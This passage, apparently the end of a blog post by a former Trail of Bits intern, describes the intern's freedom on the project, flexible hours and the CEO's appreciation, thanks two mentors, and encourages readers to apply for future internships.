    I can’t say enough good things about my experience interning at Trail of Bits. From the stress-free interview process, to my ability to participate in active discussions about the project, to the direct merging of my work, it was a great experience. In short, I was an intern, but I felt like a full-time employee. Still, here are some highlights from my internship:

    • I was given the freedom to work on the tool the way I wanted. I was never told not to do something as long as what I wanted to do improved the tool and worked toward the goal.
    • I didn’t have any restrictions on what time I worked or how long I worked for. There were days when I couldn’t make much progress on the project, as generally happens with me when I start working on something new, but I had the freedom to work at my own pace.
    • Finally, the biggest highlight of my internship was when Dan, the Trail of Bits CEO, sent a small message over Slack appreciating my work. I didn’t think I would feel this way when I read similar stories from other interns, but I really felt proud. I still remember showing that message to some of my friends.

    A heartfelt thanks

    I’d like to thank Felipe Manzano and Josselin Feist for giving me free rein over the project and making my first internship an extraordinary learning experience. Also, thank you to Trail of Bits for extending the offer to join the company full-time after my studies. This internship couldn’t have been any better, and I am hoping for a similar experience in my full-time role.

    One thing I wanted to change while writing this blog post is the use of the word “I.” Using “I” makes it feel like this experience was solely mine. This isn’t true: this story could have easily been yours. Make sure to look out for the next open internships at Trail of Bits and have your own extraordinary experience.